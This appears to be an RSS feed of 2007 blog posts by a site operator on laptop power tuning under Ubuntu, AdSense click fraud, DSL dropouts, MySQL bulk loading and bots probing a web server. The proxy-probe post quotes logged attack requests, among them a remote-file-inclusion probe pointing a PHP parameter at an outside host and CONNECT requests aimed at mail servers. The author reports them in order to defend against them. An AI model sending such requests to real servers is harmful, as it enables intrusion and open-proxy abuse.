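<br> <br>As a rough worked example of what those XP figures imply, the sketch below turns "fraction of time in C3" and "exits from C3 per second" into an average length of each C3 stay. The function name is made up for illustration, and the calculation assumes the exits are spread evenly over the second, which real interrupt traffic is not.

```python
def mean_c3_residency_ms(c3_fraction, exits_per_second):
    """Average length of one stay in C3, in milliseconds.

    Hypothetical helper: assumes the C3 exits are evenly spaced.
    """
    return 1000.0 * c3_fraction / exits_per_second


# Figures quoted above for idle XP: 98% of time in C3, about 60 exits per second.
xp_idle_ms = mean_c3_residency_ms(0.98, 60)
print(round(xp_idle_ms, 1))  # 16.3
```

So on idle XP each visit to C3 lasts roughly 16 milliseconds on average; fewer wakeups per second would stretch that out.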
<br> <br>Monitoring the reported battery draw under XP (leaving it 5 minutes to stabilize): <br>1600mW - suspended <br>3400mW - screen off (maximum battery settings) <br>5250mW - backlight level 0 <br>5350mW - enable CD drive <br>5380mW - enable modem <br>5420mW - enable audio <br>6240mW - enable wifi, on power saving mode <br>6300mW - wifi on standard mode <br>9050mW - backlight level 7 <br>5000mW - lcd panel off (everything else on) <br>+300mW - constant touchpad use (5% busy cpu) <br> <br>Conclusion: <br>Although the touchpad generates a lot of interrupts, under XP this does not translate to much increased CPU usage, or much increased power usage. <br> <br>Under Ubuntu, moving the mouse using the touchpad took over 10% of the CPU, depending on what application is under the mouse. With Firefox under the pointer, for instance, the CPU is busy (albeit at 800MHz) 10% of the time. Removing the "ondemand" cpufreq governor helps increase C3 state usage: the cpu is able to spend more time at C3 during mouse movement than it could at 800MHz, and power usage actually dropped. <br> <br>This article &raquo;<A HREF="http://softwarecommunity.intel.com/articles/eng/1086.htm" >softwarecommunity.intel.com/arti&middot;&middot;&middot;1086.htm</A> is a good one on how C3 power benefits get destroyed by frequent interrupts. <br> <br><div class="wiki"><h3>Frequency scaling / under-volt</h3></div> <br>Frequency scaling was already there in Feisty and Gutsy anyway, although on this laptop the only options offered by ACPI are full speed (1.2GHz) or 800MHz (same as XP). I don't think frequency scaling is very useful on this platform. If you have work to do, do it as quickly as possible so you can go back to C3 state. <br> <br>One can also attempt to lower the voltage to save power and heat, but supposedly this intel chip locks the minimum voltage at barely below the default at 800MHz, at 0.930V or something like that. Running at 1.2GHz and a lower voltage would be useful, however. 
I haven't found a way to determine whether the requested voltage is actually in use. <br> <br><div class="wiki"><h3>Power Results</h3></div> <br><b>Best results</b> <br>In text mode, with a custom kernel, with a couple of daemons killed and without running X I can get the average time in C3 state to over 200ms (less than 5 interrupts per second) while still being on wifi. At this point the entire laptop is using about 6 watts of power even though the LCD backlight is active. With about 50 watts of battery capacity the runtime in this mode would be theoretically over 7 hours. <br> <br>As this article points out, allowing C3 to actually save power requires 1ms+ residency: &raquo;<A HREF="http://softwarecommunity.intel.com/articles/eng/1086.htm " >softwarecommunity.intel.com/arti&middot;&middot;&middot;086.htm </A><br> <br>Running on desktop, with mouse and pointer use, on brightness setting 3 from 0..7, power use is around 7.5 watts. This is not quite as good as XP. <br> <br>Critically, I was unable to achieve the same minimum power consumption as XP (wifi off, devices off). XP gets down below 5 watts here. Ubuntu cannot get below 6 watts. Ubuntu must be leaving a key device on, or not in a low power state. <br> <br><b>Typical Results</b> <br>Once you have identified with powertop the problem drivers and mitigated them as you can, once you have disabled bluetooth, reduced wifi consumption, turned off cdrom polling and set HDD power saving, and decreased the need for linux to write to the drive with various settings then just using a browser (reading/typing and sometimes fetching new pages) you can expect to average about 7.5 watts. <br> <br>Using the 3d desktop instead (which does look so much cleaner), power will rise to over 9 watts, giving a 3.5 hour runtime. <br> <br>Powertop will report about 50 or so interrupts per second. Many more if you're using the pad. 
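<br> <br>The "theoretically over 7 hours" figure above can be checked with a one-line calculation. This is only a sketch: it assumes the "50 watts" of battery capacity means 50 watt-hours, that the draw stays constant, and that the whole capacity is usable, so it is an upper bound rather than a prediction. The function name is invented for the example.

```python
def ideal_runtime_hours(capacity_wh, draw_watts):
    """Upper bound on runtime: usable capacity divided by a constant draw.

    Hypothetical helper; real batteries and real workloads do worse.
    """
    return capacity_wh / draw_watts


# Text mode, wifi on, backlight active: about 6 watts from an assumed 50 Wh.
print(round(ideal_runtime_hours(50, 6), 1))  # 8.3
```

Measured runtime will come in below this bound, since the draw is not constant and the battery cannot be run all the way down.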
<br> <br><center>While I type this post up, I am running on battery and power consumption hovers between 8 and 9 watts. LCD brightness is setting 3 out of 7 max, wifi is active.</center> <br> <br>The (older) battery I have here reports "full" at 50 watt-hours - which is about 15% less than its rated capacity. It has probably been through over 150 charge/discharge cycles in its life. <br> <br><b>Disk activity</b> <br>It seems to be difficult to keep the disk idle during casual use. Even with a 30 second commit on the partition, there always seems to be something that needs writing. sysctl vm.block_dump=1 will reveal the programs that dirty the buffers, but obviously firefox needs to write cache files, and log files and state files are written by daemons. It is difficult to eliminate all of this. <br> <br><b>Future Mods</b> <br>I'd like to perhaps obtain a 64GB solid state 1.8" sandisk/samsung drive to replace the internal 80GB 1.8" drive. The advantages are myriad. Power consumption drops, noise drops to zero and so does heat. The flash drive would also be impervious to vibration. Sony are already shipping TX series with this drive as an option. Unfortunately it is not available on the open market yet, or if it is, only at a usurious price. <br> <br>I'd also like to get the OEM (or otherwise) 11000mAh larger battery. The combination of the two (battery + flash drive) would probably provide an ultra-portable that I could use for another 5 years before getting envious of the latest hardware. <br> <br><b>Small rant over the fragility of the screen on the Vaio TX</b> <br>Despite the vaunted carbon fiber case, which is really mostly just a carbon fiber lid, the screen is fragile. The lid is too flexible. If pressure is applied the screen will touch the keys (transferring finger grease). If too much pressure is applied the screen will be damaged or even cracked. Buying a new screen currently costs about $350 on ebay. 
Compared to my last two vaios (505 and tr/1) this one is the most fragile, at least in the LCD department. The keyboard has also started to lose lettering, and the palm rest areas have subtly changed color. Mind you, I do spend hours on it each and every day. <br> <br><b>Current status</b> <br>I update this article every now and again when I find something new. As of the 28th of October I am still searching for the source of the increased idle power consumption (measured against XP), and working out the best way to kick NetworkManager back after suspend/resume (it sometimes needs that kick).<br><br><a href="http://www.dslreports.com/shownews/Ubuntu-Gutsy-on-Sony-TX-series-TXN19P-88694">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Ubuntu-Gutsy-on-Sony-TX-series-TXN19P-88694</guid>
<pubDate>Mon, 22 Oct 2007 23:36:57 EDT</pubDate>
</item>
<item>
<title>Adsense Click Fraud - Female Impotence</title>
<description><![CDATA[<p>This morning I noticed a strange phenomenon. Every hour or less, one of a bunch of random IPs shows up at the site, loads a random forum page, then does a site search for "Female Impotence", then vanishes. As a consequence, our cloud of "most popular searches" started to include the phrase - hardly a subject our average visitor cares about. The inclusion of this search phrase in our "most popular" prompted my investigation. <br> <br>The range of IPs involved in this search is wide and random - over 156 distinct IPs so far. Most but not all of them are from overseas: Brazil, China, Germany, Hong Kong, Russia, Japan. <br> <br>The user agents vary: basically a typical zoo of Internet Explorer browsers on Windows. <br> <br>The puzzle is that there is no direct value in getting into our cloud of "most popular searches". It surfaces no external link. It results in no matches on the site itself. It provides no page rank boost. <br> <br>So what could be the incentive? <br> <br>One possibility is that the pharma industry has kicked off a skunk works campaign to create a new market for a product that needs one. <a href="http://news.bbc.co.uk/2/hi/health/2621705.stm">This article at the BBC</a> dating from 2003 mentions a report in the UK that pharma is trying to build the market for a new "disease" that of course needs expensive pills. I am cynical enough to want that to be the explanation. But "google trends" doesn't show the search term on its radar at all. <br> <br><a href="http://adsense-high-paying-keywords.blogspot.com/2007/05/top-paying-medical-keywords.html">This blog post says</a> that the phrase is in the top 50 most highly sought after (highly paid) adsense hits. <br> <br>Then the penny dropped. This must be click-fraud. 
If adverts for pills pay $10 a click, and there were over 250 fetches of the search results for 'female impotence', which in turn requests a search block from google, and in turn an advert is clicked, then someone somewhere is out of pocket $2500 from just the hits on our site alone. If these browsers were engaged in 100 other site-based searches they could have racked up a quarter of a million bucks over the last 15 days. And I suppose we've been overpaid as well. <br> <br>I have reported it to google. I have no financial incentive to do so: somehow I doubt I'd have seen a reversal of payments if I didn't report it. In our history of using adsense the daily clicks and payments results in a check later on, with minimal if any deductions. Are their click-fraud systems so sensitive they avoid charge-backs even intra day?  <br> <br>Either way, I doubt this is the very first time we've been an unwitting participant in a click-fraud campaign. <br> <br>Update: It occurred to me that it isn't obvious who gains from this click-fraud. The answer is that it is likely to be reverse click-fraud. If you are competing for adsense placement and can't out-bid a competitor you can just spend her into the ground instead. Aim a botnet at her adverts across a range of sites and either google will cancel the ads due to click fraud or (more likely) they will exceed their budget and the ads will disappear and your (cheaper) ads will appear in their place. Nasty business.<br><a href="http://www.dslreports.com/shownews/Adsense-Click-Fraud-88596">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Adsense-Click-Fraud-88596</guid>
<pubDate>Fri, 19 Oct 2007 13:37:17 EDT</pubDate>
</item>
<item>
<title>Here comes the rain again, falling on my DSL - </title>
<description><![CDATA[<p>Verizon could use this Westell wirespeed modem as a rain gauge for my zip code. Rain began at 14:07. Frequency of disconnects corresponds to the strength of the rain. I'm wondering why Verizon network engineers don't collect this info from their vast array of DSL modems then roll trucks to look for and fix the problems with such bad wiring, rather than waiting for an exasperated customer to waste time calling their support numbers with a probable vague description of the issue ('sometimes, web sites time out'). <br> <br>They could easily run stats to look for weather related problems by looking at grouped failures that correlate with recorded rain in a zip code. <br> <br><div class="code"><pre><span class="codetext">Events are listed starting from the most recent.
**********************************************************************
THU OCT 11 15:40:23 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP link layer failure
THU OCT 11 15:26:28 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 15:26:28 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 15:26:19 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 15:26:19 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 15:26:19 2007     Disconnecting session(0): Auto Registration due to dsl Restart
THU OCT 11 15:23:30 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 15:23:30 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 15:23:21 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 15:23:21 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 15:23:21 2007     Disconnecting session(0): Auto Registration due to dsl Restart
THU OCT 11 15:07:07 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 15:07:07 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 15:06:58 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 15:06:58 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 15:06:58 2007     Disconnecting session(0): Auto Registration due to dsl Restart
THU OCT 11 14:59:03 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 14:59:02 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 14:58:53 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 14:58:53 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 14:58:53 2007     Disconnecting session(0): Auto Registration due to dsl Restart
THU OCT 11 14:45:33 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 14:45:33 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 14:45:24 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 14:45:24 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 14:45:24 2007     Disconnecting session(0): Auto Registration due to dsl Restart
THU OCT 11 14:35:49 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 14:35:49 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 14:35:40 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 14:35:40 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 14:35:40 2007     Disconnecting session(0): Auto Registration due to dsl Restart
THU OCT 11 14:07:26 2007     PPP CONNECTED on VPI 0 VCI 35
THU OCT 11 14:07:26 2007     Connecting session(0): Auto Registration due to Manual Connect
THU OCT 11 14:07:17 2007     Disconnecting session(-1):  due to PADT received
THU OCT 11 14:07:17 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down
THU OCT 11 14:07:17 2007     Disconnecting session(0): Auto Registration due to dsl Restart
WED OCT 10 00:25:53 2007     PPP CONNECTED on VPI 0 VCI 35
</span></pre></div><br><a href="http://www.dslreports.com/shownews/Here-comes-the-rain-again-falling-on-my-DSL-88343">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Here-comes-the-rain-again-falling-on-my-DSL-88343</guid>
<pubDate>Thu, 11 Oct 2007 16:19:05 EDT</pubDate>
</item>
<item>
<title>Probing for open proxies with CONNECT - </title>
<description><![CDATA[<p>Looking through server logs just has to be done regularly. After ignoring mine for some time, I did an audit recently and found some unpleasant surprises. My first observation is that the number of bots probing for open proxy servers with syntax such as this: <br><div class="code"><pre><span class="codetext">GET http://californianloans.com/ProxyHeader.php
GET http://clickingagent.com/proxycheck.php?ip=209.123.109.175&amp;port=80&amp;loc=
POST http://89.149.241.191/d3sUpER3fg.php
</span></pre></div>has increased dramatically. In a single day we get over 1000 such requests from over 400 different IP addresses. <br> <br>This was an unfortunate waste of bandwidth because we don't show a 403 error page for invalid URLs; instead we redirect them to our home page. <br> <br>The next hassle is the rise of bots looking for web servers which respond to the CONNECT command. I didn't even know this command existed in the spec, but it is listed there, right after GET, POST and HEAD. The typical CONNECT command is: <br> <br><div class="code"><pre><span class="codetext">CONNECT 204.126.127.253:25
CONNECT 202.248.238.10:25
:
</span></pre></div> <br>where these IPs are well-known mail servers. 45 different IPs a day are trying this, some over 100 times per day. <br> <br>As well as this noise, of course, there is the normal stream of probes for badly configured php admin programs and other exploitable standard packages: <br> <br><div class="code"><pre><span class="codetext"> GET ..admin_users.php?phpbb_root_path=http://124.0.201.20/bbs000/test.txt? 
</span></pre></div> <br>Here test.txt at 124.0.201.20 is fetched by the vulnerable script, and therefore the script can be used as a dumb proxy server if the URL succeeds. <br> <br>It is worth paying attention to your access_log and error_log. The amount of noise directed against public web servers has clearly risen as the cost of generating the noise (via compromised bot nets) drops to nearly zero. <br> <br>On the topic of logs: With the increasing power of web servers to deal with normal traffic, you can also increase the amount of logging they do. Apache 2.x has a useful millisecond per request field which I immediately added to my CustomLog line so that I could write a program to tail the log, and dynamically generate a live chart of response times, request response sizes, and error codes. <br> <br>Here is a snapshot, but mine refreshes every few seconds: <br>&raquo;<A HREF="/front/frontend.html ">/front/frontend.html </A><br> <br>If you watch the general shape of this graph it becomes quite easy to determine if things have skewed in some way to the point of abnormality. In fact, I'll probably add to this program to display a long term average on the right and the current very short term view on the left.<br><br><a href="http://www.dslreports.com/shownews/Probing-for-open-proxies-with-CONNECT-88338">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Probing-for-open-proxies-with-CONNECT-88338</guid>
<pubDate>Thu, 11 Oct 2007 12:04:57 EDT</pubDate>
</item>
<item>
<title>Mysql and a billion rows using innodb - </title>
<description><![CDATA[<p>I'm working on recreating and reloading our 'reverse index' that is used for site search. It reverse-indexes 19 million forum posts and a few other smaller collections of text, generating one (weighted) record per unique "word" per object. That is how one reaches a billion rows: an average of 50 unique "words" per "item" x 20 million "items" = 1 billion records. <br> <br>I have some random timings for your amusement: <br> <br><b>1. Creating it in the first place.</b> <br>Surprisingly, this is the least dramatic part of the job. Reading all the plain text, stripping format, splitting it up into words, creating all the location objects in another (mere 20 million row) data table, and then dumping the final file as 19GB of text takes "only" a couple of hours. It could be much faster if I ran this job 4 times in parallel (and pushed our mysql server to deliver the old posts more quickly). <br> <br><b>2. Simply reading the entire file.</b> <br>Since it is 19GB and the disk array can do ~150MB/sec sequential read, even reading the entire file once from end to end is going to take a few minutes. Modifying it or removing items is really tricky. So it had better be right from the word go! <br> <br><b>3. Loading this data into mysql.</b> <br>The fastest way to load data into a mysql table is to use batch inserts that make large single transactions (megabytes each). The syntax is something like: <br>insert ignore into table (fields) values (....),(....),(...) <br>The 'ignore' is so one possible duplicate doesn't blow out the entire insert. <br>Inserting un-ordered into mysql/myisam like this, with perl creating the insert strings, can be done at a high rate of speed if the table does not have an index. Testing this shows it running in less than 1 hour (way over 300,000 rows per second inserted). <br> <br><b>4. Sorting in mysql, space usage in myisam and InnoDB</b> <br>Doing a table sort in mysql is a killer. 
I don't actually know the runtime. I gave up after a couple of hours. I don't even know whether the runtime is exponential with the size of the table, or linear. Interestingly, sorting and then just selecting the 'top' items by limit is very quick, on the order of 10 minutes or so. This high speed for "limit N" sort is also reported by the excellent mysql performance blog: <a href="http://www.mysqlperformanceblog.com/2007/08/18/how-fast-can-you-sort-data-with-mysql/">how fast can you sort data with mysql?</a>. The table in mysql takes little more space than the text file to store as myisam, but it balloons to more than 40GB of data under innodb, or 65GB if it is fragmented - and innodb optimize/defragment is famously slow! I'm afraid of running it. So I should sort the data before inserting it. I want maximum clustering for these 7 years' worth of old data, even if new data will slowly degrade the clustering. <br> <br><b>5. Sorting the data using gnu unix sort</b> <br>Sorting a billion rows is handled by unix sort with sort/merge passes. It writes sorted runs to temporary files, whose size depends on how much memory you are prepared to allocate. If you do: <br>sort -S 2g <br>(which instructs sort to use 2GB of memory) then sort creates 700MB temporary files at a rate of about one file every 2 minutes. The overall sort time is around one hour. If sort were multi-threaded it could be as many times faster as you have cores available. <br> <br><b>6. Loading it all into mysql InnoDB</b> <br>First attempt, with two indexes, innodb quickly slows down to approx 5000 to 7000 rows per second. At 6000 rows a second fully loading this table would take over 24 hours! If the rate declined further, this could stretch even longer. An unacceptable result with a lot of uncertainty during execution (will it ever finish?). 
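<br> <br>To put the insert rates quoted so far side by side, here is a small back-of-the-envelope sketch. It assumes a round one billion rows and a rate that stays constant for the whole load, which the innodb numbers above suggest is optimistic. The function name and labels are made up for the example.

```python
def hours_to_load(total_rows, rows_per_second):
    """Hours needed to insert total_rows at a constant rows_per_second."""
    return total_rows / rows_per_second / 3600.0


TOTAL_ROWS = 1000000000  # assumed round figure for the reverse index

# Rates taken from the text: un-indexed myisam load, then the first innodb attempt.
for label, rate in (("myisam, no index", 300000), ("innodb, first attempt", 6000)):
    print(label, round(hours_to_load(TOTAL_ROWS, rate), 1))
# myisam, no index 0.9
# innodb, first attempt 46.3
```

At a steady 6000 rows a second the load would need nearly two days, so "over 24 hours" is, if anything, generous.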
<br>Removing a tiny secondary index (which nevertheless internally duplicates the PK), setting innodb_flush_log_at_trx_commit=0 from 2 (not recommended for production), setting innodb_flush_method=O_DIRECT, increasing the innodb_buffer_pool_size to 10g from 6g, further increasing the insert packet size to 25k rows per insert, and setting a write lock on the table, the insertion rate starts at 100,000 per second but quickly slows to ~50,000 per second where (hooray) it appears to be stable. If it can maintain this average it will be done in 5 hours. This is 10x faster. I suppose only one change was responsible for most of this improvement. I don't know which, however. <br>With 4 cores during this procedure approx 2 are occupied, and disk i/o averages about 15mb/sec write. (The perl loader that is reading the flat file and building the insert transactions is only taking 10% of one core). <br>Since there is still disk subsystem bandwidth (only a small percentage of time is disk-wait) plus with 50% idle net cpu capacity, bulk inserts like this are not fully taking advantage of more than two cores. 
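<br> <br>The actual loader here is written in perl and is not shown. As an illustration only, this is a minimal Python sketch of the same batching idea: read rows from any iterable and emit one multi-row "insert ignore" statement per batch of 25k rows. The table and column names follow the insert statements visible in the InnoDB monitor output in this post; the function name, the use of %s placeholders (as accepted by common Python MySQL drivers), and the default batch size wiring are assumptions.

```python
from itertools import islice

# Column names as they appear in the monitor output in this post.
COLUMNS = ("ReverseIndex_Word", "ReverseIndex_Score", "Location_ID", "y")


def batched_inserts(rows, batch_size=25000, table="ReverseIndex"):
    """Yield (sql, params) pairs, one multi-row INSERT IGNORE per batch.

    Hypothetical helper: it only builds statements, it does not talk
    to a database. Pass each pair to your driver's cursor.execute().
    """
    rows = iter(rows)
    row_placeholder = "(" + ",".join(["%s"] * len(COLUMNS)) + ")"
    while True:
        batch = list(islice(rows, batch_size))
        if not batch:
            return
        sql = "INSERT IGNORE INTO {} ({}) VALUES {}".format(
            table,
            ", ".join(COLUMNS),
            ",".join([row_placeholder] * len(batch)),
        )
        # Flatten the rows so the values line up with the placeholders.
        params = [value for row in batch for value in row]
        yield sql, params
```

Each yielded statement is one large transaction when autocommit is on. The server's max_allowed_packet has to be big enough for a 25k-row statement, so the batch size may need adjusting.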
<br> <br>After "tuning" and during the bulk insert: <br><div class="code"><pre><span class="codetext"> ===================================== 070925 21:22:33 INNODB MONITOR OUTPUT ===================================== Per second averages calculated from the last 44 seconds ---------- SEMAPHORES ---------- OS WAIT ARRAY INFO: reservation count 13714, signal count 13691 Mutex spin waits 0, rounds 483238, OS waits 5541 RW-shared spins 8377, OS waits 4122; RW-excl spins 8187, OS waits 3950 ------------ TRANSACTIONS ------------ Trx id counter 0 505355010 Purge done for trx's n:o &lt; 0 505352977 undo n:o &lt; 0 0 History list length 5 Total number of lock structs in row lock hash table 0 LIST OF TRANSACTIONS FOR EACH SESSION: ---TRANSACTION 0 0, not started, process no 24763, OS thread id 1151719744 MySQL thread id 98, query id 46658 localhost root show innodb status ---TRANSACTION 0 0, not started, process no 24763, OS thread id 1150916928 MySQL thread id 97, query id 46590 orange.dslreports.com 192.168.1.200 dslreports ---TRANSACTION 0 505355009, ACTIVE 1 sec, process no 24763, OS thread id 1149913408 inserting, thread declared inside InnoDB 330 mysql tables in use 3, locked 3 3 lock struct(s), heap size 368, 0 row lock(s), undo log entries 11693 MySQL thread id 54, query id 46633 orange.dslreports.com 192.168.1.200 dslreports update insert ignore into ReverseIndex (ReverseIndex_Word, ReverseIndex_Score, Location_ID, y) values ('afraid',0.5,35358162,2001),('afraid',0.5,35358237,2001),('afraid',0.5,35358371,2001),('afraid',0.5,35358565,2001),('afraid',0.5,35358973,2001),('afraid',0.5,3535963,2006),('afraid',0.5,35360270,2001),('afraid',0.5,3536096,2006),('afraid',0.5,35360979,2001),('afraid',0.5,35366742,2001),('afraid',0.5,35366837,2001),('afraid',0.5,35367484,2001),('afraid',0.5,35368671,2001),('afraid',0.5,35368926,2001),('afraid',0.5,35369066,2001),('afraid',0.5,35369144,2001),('afraid',0.5,35369736,2001),('afraid',0.5, -------- FILE I/O -------- I/O thread 0 
state: waiting for i/o request (insert buffer thread) I/O thread 1 state: waiting for i/o request (log thread) I/O thread 2 state: waiting for i/o request (read thread) I/O thread 3 state: waiting for i/o request (write thread) Pending normal aio reads: 0, aio writes: 0,  ibuf aio reads: 0, log i/o's: 0, sync i/o's: 0 Pending flushes (fsync) log: 0; buffer pool: 0 34941 OS file reads, 94666 OS file writes, 14986 OS fsyncs 0.91 reads/s, 17612 avg bytes/read, 28.39 writes/s, 10.50 fsyncs/s ------------------------------------- INSERT BUFFER AND ADAPTIVE HASH INDEX ------------------------------------- Ibuf: size 5646, free list len 22374, seg size 28021, 0 inserts, 1249359 merged recs, 27611 merges Hash table size 21249871, used cells 656746, node heap has 985 buffer(s) 18078.50 hash searches/s, 37474.85 non-hash searches/s --- LOG --- Log sequence number 37 4230141094 Log flushed up to   37 4226707564 Last checkpoint at  37 3650382906 0 pending log writes, 0 pending chkp writes 5899 log i/o's done, 2.32 log i/o's/second ---------------------- BUFFER POOL AND MEMORY ---------------------- Total memory allocated 11492247262; in additional pool allocated 10723840 Dictionary memory allocated 50960 Buffer pool size   655360 Free buffers       351098 Database pages     303277 Modified db pages  33971 Pending reads 0 Pending writes: LRU 0, flush list 0, single page 0 Pages read 39106, created 264171, written 316562 0.98 reads/s, 331.22 creates/s, 341.90 writes/s Buffer pool hit rate 1000 / 1000 -------------- ROW OPERATIONS -------------- 1 queries inside InnoDB, 0 queries in queue 1 read views open inside InnoDB 3 tablespace extents now reserved for B-tree split operations Main thread process no. 
24763, id 1140881728, state: sleeping Number of rows inserted 50820193, updated 0, deleted 0, read 2 54743.46 inserts/s, 0.00 updates/s, 0.00 deletes/s, 0.00 reads/s </span></pre></div> <br>before: <br><div class="code"><pre><span class="codetext"> Per second averages calculated from the last 32 seconds ---------- SEMAPHORES ---------- OS WAIT ARRAY INFO: reservation count 119377, signal count 118789 Mutex spin waits 0, rounds 24466870, OS waits 79493 RW-shared spins 30137, OS waits 14091; RW-excl spins 74491, OS waits 17320 ------------ TRANSACTIONS ------------ Trx id counter 0 505351913 Purge done for trx's n:o &lt; 0 505325357 undo n:o &lt; 0 0 History list length 18 Total number of lock structs in row lock hash table 0 LIST OF TRANSACTIONS FOR EACH SESSION: ---TRANSACTION 0 0, not started, process no 23767, OS thread id 1153526080 MySQL thread id 27375, query id 83255267 localhost root show innodb status ---TRANSACTION 0 0, not started, process no 23767, OS thread id 1149110592 MySQL thread id 27384, query id 83255200 orange.dslreports.com 192.168.1.200 dslreports ---TRANSACTION 0 505351912, ACTIVE 0 sec, process no 23767, OS thread id 1150515520 inserting, thread declared inside InnoDB 163 mysql tables in use 3, locked 3 3 lock struct(s), heap size 368, 0 row lock(s), undo log entries 1841 MySQL thread id 25258, query id 83255261 orange.dslreports.com 192.168.1.200 dslreports update insert ignore into ReverseIndex (ReverseIndex_Word, ReverseIndex_Score, Location_ID, y) values 
('everything',0.5,38147190,2000),('everything',0.5,3814720,2006),('everything',0.5,38147203,2000),('everything',0.5,38147324,2000),('everything',0.5,38147344,2000),('everything',0.5,38147368,2000),('everything',0.5,38147432,2000),('everything',0.5,38147447,2000),('everything',0.5,3814753,2006),('everything',0.5,38147570,2000),('everything',0.5,38147600,2000),('everything',0.5,38147624,2000),('everything',0.5,38147672,2000),('everything',0.5,38147684,2000),('everything',0.5,38147760,2000),('everything -------- FILE I/O -------- I/O thread 0 state: waiting for i/o request (insert buffer thread) I/O thread 1 state: waiting for i/o request (log thread) I/O thread 2 state: waiting for i/o request (read thread) I/O thread 3 state: waiting for i/o request (write thread) Pending normal aio reads: 0, aio writes: 0,  ibuf aio reads: 0, log i/o's: 0, sync i/o's: 0 Pending flushes (fsync) log: 0; buffer pool: 1 44374 OS file reads, 78902654 OS file writes, 383233 OS fsyncs 14.84 reads/s, 17280 avg bytes/read, 187.46 writes/s, 22.91 fsyncs/s ------------------------------------- INSERT BUFFER AND ADAPTIVE HASH INDEX ------------------------------------- Ibuf: size 16778, free list len 8408, seg size 25187, 5103138 inserts, 2021625 merged recs, 38211 merges Hash table size 12750011, used cells 7987928, node heap has 18521 buffer(s) 8803.85 hash searches/s, 5457.74 non-hash searches/s --- LOG --- Log sequence number 36 2142170188 Log flushed up to   36 2141719998 Last checkpoint at  36 1564120222 0 pending log writes, 0 pending chkp writes 77784071 log i/o's done, 3.16 log i/o's/second ---------------------- BUFFER POOL AND MEMORY ---------------------- Total memory allocated 6921245678; in additional pool allocated 10765312 Dictionary memory allocated 56840 Buffer pool size   393216 Free buffers       32 Database pages     374663 Modified db pages  270643 Pending reads 0 Pending writes: LRU 0, flush list 1, single page 0 Pages read 92038, created 2499921, written 13243868 15.66 
reads/s, 32.69 creates/s, 815.47 writes/s Buffer pool hit rate 1000 / 1000 -------------- ROW OPERATIONS -------------- 1 queries inside InnoDB, 0 queries in queue 1 read views open inside InnoDB Main thread process no. 23767, id 1140881728, state: sleeping Number of rows inserted 400273553, updated 0, deleted 154959, read 131020195 6169.28 inserts/s, 0.00 updates/s, 0.00 deletes/s, 0.00 reads/s </span></pre></div> <br>The server is mysql 5.1.21-beta-log  running on x86_64 Suse 10 SP1 with 16gb of memory/ Intel 5140 cpus (2 x dual core) connected to the afore-benchmarked MD3000 disk enclosure. The filesystem is XFS, over two striped LUNs using LVM.<br><br><a href="http://www.dslreports.com/shownews/Mysql-and-a-billion-rows-using-innodb-87890">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Mysql-and-a-billion-rows-using-innodb-87890</guid>
<pubDate>Tue, 25 Sep 2007 22:27:32 EDT</pubDate>
</item>
<item>
<title>domain name shopping - </title>
<description><![CDATA[<p>Back in May I had an "idea" for a new site and got sucked into looking at available domain names. If you want your new domain name to actually MEAN something you are stuck buying it from a domain name bank of some kind. <br> <br>I made an inquiry through buydomains.com for the name I was interested in. They run some kind of feeble ongoing "domain auction" site that tries to look like ebay but actually has very little actual commerce. <br> <br>I didn't like the initial price I received, USD 1288, and when I questioned the price and the fact I also got a cellphone call, I got this reply: <br><div class="bquote"> <br>I might have called.  The prices we quote are based on the price we paid <br>for the name as well as the revenue it generates as a parked name.  We <br>pay much more than just a registration fee for each of the 800,000 names <br>we own.  That being said I do have room for negotiation and would like <br>to try and come up with a price we can both agree on.  What would be the <br>best number to call you at so we can take a minute to talk about it? <br> <br>Jay Wladkowski <br>Account Executive <br>BuyDomains Division <br>NameMedia, Inc. <br>230 Third Avenue, 2nd Floor <br>Waltham, MA  02451 <br></div> <br> <br>Account Executive huh? Yeah Right. Goodbye! <br> <br>Since that day over the subsequent months I've been spammed both by phone (calls I ignore) and by email with the following subject lines: <br> <br>Agressive Pricng Now Through June 30th <br>July Savings on .....net <br>Summer Discount on .....net <br>Back to Business Domain Savings <br>New Discount on ....net <br> <br>With similar message bodies all encouraging me to call and get the new one-time-only, special deal on the domain name I was interested in. <br> <br>I hate the way they do business. If the domain name is only of interest to me and nobody else, then the market price is what *I* offer. 
Yet they would rather hold onto this worthless (to them) name and keep on plugging away hoping that the nibble they got is a fish. <br> <br>What a horrible business to be in.<br><a href="http://www.dslreports.com/shownews/domain-name-shopping-87513">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/domain-name-shopping-87513</guid>
